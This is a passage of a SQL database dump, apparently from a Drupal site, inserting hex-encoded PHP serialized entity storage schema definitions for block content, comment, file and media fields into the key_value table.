b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.info', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a22696e666f223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a22696e666f223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.langcode', 0x613a343a7b733a31333a22626c6f636b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.reusable', 0x613a313a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a383a227265757361626c65223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32393a22626c6f636b5f636f6e74656e745f6669656c645f5f7265757361626c65223b613a313a7b693a303b733a383a227265757361626c65223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_created', 0x613a313a7b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_default', 0x613a313a7b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_id', 0x613a343a7b733a31333a22626c6f636b5f636f6e74656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_log', 0x613a313a7b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31323a227265766973696f6e5f6c6f67223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_translation_affected', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.revision_user', 0x613a313a7b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a31333a227265766973696f6e5f75736572223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a34353a22626c6f636b5f636f6e74656e745f6669656c645f5f7265766973696f6e5f757365725f5f7461726765745f6964223b613a313a7b693a303b733a31333a227265766973696f6e5f75736572223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.status', 0x613a323a7b733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a22626c6f636b5f636f6e74656e745f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.type', 0x613a323a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2274797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33363a22626c6f636b5f636f6e74656e745f6669656c645f5f747970655f5f7461726765745f6964223b613a313a7b693a303b733a343a2274797065223b7d7d7d733a32343a22626c6f636b5f636f6e74656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2274797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33363a22626c6f636b5f636f6e74656e745f6669656c645f5f747970655f5f7461726765745f6964223b613a313a7b693a303b733a343a2274797065223b7d7d7d7d),
('entity.storage_schema.sql', 'block_content.field_schema_data.uuid', 0x613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a33323a22626c6f636b5f636f6e74656e745f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'comment.entity_schema_data', 0x613a323a7b733a373a22636f6d6d656e74223b613a313a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22636964223b7d7d733a31383a22636f6d6d656e745f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a22636964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a353a7b733a33393a22636f6d6d656e745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a22636964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a32383a22636f6d6d656e745f5f7374617475735f636f6d6d656e745f74797065223b613a333a7b693a303b733a363a22737461747573223b693a313b733a31323a22636f6d6d656e745f74797065223b693a323b733a333a22636964223b7d733a31393a22636f6d6d656e745f5f7374617475735f706964223b613a323a7b693a303b733a333a22706964223b693a313b733a363a22737461747573223b7d733a31363a22636f6d6d656e745f5f6e756d5f6e6577223b613a373a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31323a22636f6d6d656e745f74797065223b693a333b733a363a22737461747573223b693a343b733a373a2263726561746564223b693a353b733a333a22636964223b693a363b733a363a22746872656164223b7d733a32343a22636f6d6d656e745f5f656e746974795f6c616e67636f6465223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31323a22636f6d6d656e745f74797065223b693a333b733a31363a2264656661756c745f6c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.changed', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.cid', 0x613a323a7b733a373a22636f6d6d656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22636964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22636964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.comment_body', 0x613a313a7b733a32313a22636f6d6d656e745f5f636f6d6d656e745f626f6479223b613a343a7b733a31313a226465736372697074696f6e223b733a34343a22446174612073746f7261676520666f7220636f6d6d656e74206669656c6420636f6d6d656e745f626f64792e223b733a363a226669656c6473223b613a383a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a3131343a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f2c20776869636820666f7220616e20756e76657273696f6e656420656e746974792074797065206973207468652073616d652061732074686520656e74697479206964223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31383a22636f6d6d656e745f626f64795f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a31393a22636f6d6d656e745f626f64795f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31393a22636f6d6d656e745f626f64795f666f726d6174223b613a313a7b693a303b733a31393a22636f6d6d656e745f626f64795f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.comment_type', 0x613a323a7b733a373a22636f6d6d656e74223b613a323a7b733a363a226669656c6473223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33383a22636f6d6d656e745f6669656c645f5f636f6d6d656e745f747970655f5f7461726765745f6964223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d7d7d733a31383a22636f6d6d656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33383a22636f6d6d656e745f6669656c645f5f636f6d6d656e745f747970655f5f7461726765745f6964223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.created', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a373a2263726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32323a22636f6d6d656e745f6669656c645f5f63726561746564223b613a313a7b693a303b733a373a2263726561746564223b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.default_langcode', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.entity_id', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a393a22656e746974795f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a303a7b7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.entity_type', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a22656e746974795f74797065223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.field_name', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31303a226669656c645f6e616d65223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.homepage', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a22686f6d6570616765223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.hostname', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a22686f73746e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.langcode', 0x613a323a7b733a373a22636f6d6d656e74223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.mail', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226d61696c223b613a333a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235343b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.name', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a36303b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.pid', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22706964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a303a7b7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.status', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.subject', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a227375626a656374223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a36343b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.thread', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22746872656164223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.uid', 0x613a313a7b733a31383a22636f6d6d656e745f6669656c645f64617461223b613a333a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32393a22636f6d6d656e745f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a31383a22636f6d6d656e745f6669656c645f5f756964223b613a323a7b733a353a227461626c65223b733a353a227573657273223b733a373a22636f6c756d6e73223b613a313a7b733a333a22756964223b733a333a22756964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'comment.field_schema_data.uuid', 0x613a313a7b733a373a22636f6d6d656e74223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32363a22636f6d6d656e745f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'file.entity_schema_data', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22666964223b7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.changed', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a323a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31393a2266696c655f6669656c645f5f6368616e676564223b613a313a7b693a303b733a373a226368616e676564223b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.created', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a2263726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.fid', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22666964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.filemime', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2266696c656d696d65223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.filename', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2266696c656e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.filesize', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2266696c6573697a65223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.langcode', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.status', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a323a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31383a2266696c655f6669656c645f5f737461747573223b613a313a7b693a303b733a363a22737461747573223b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.uid', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32363a2266696c655f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.uri', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22757269223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31353a2266696c655f6669656c645f5f757269223b613a313a7b693a303b733a333a22757269223b7d7d7d7d),
('entity.storage_schema.sql', 'file.field_schema_data.uuid', 0x613a313a7b733a31323a2266696c655f6d616e61676564223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32333a2266696c655f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'media.entity_schema_data', 0x613a343a7b733a353a226d65646961223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a226d6964223b7d733a31313a22756e69717565206b657973223b613a313a7b733a31303a226d656469615f5f766964223b613a313a7b693a303b733a333a22766964223b7d7d7d733a31343a226d656469615f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22766964223b7d733a373a22696e6465786573223b613a313a7b733a31303a226d656469615f5f6d6964223b613a313a7b693a303b733a333a226d6964223b7d7d7d733a31363a226d656469615f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a226d6964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a33373a226d656469615f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a226d6964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a31303a226d656469615f5f766964223b613a313a7b693a303b733a333a22766964223b7d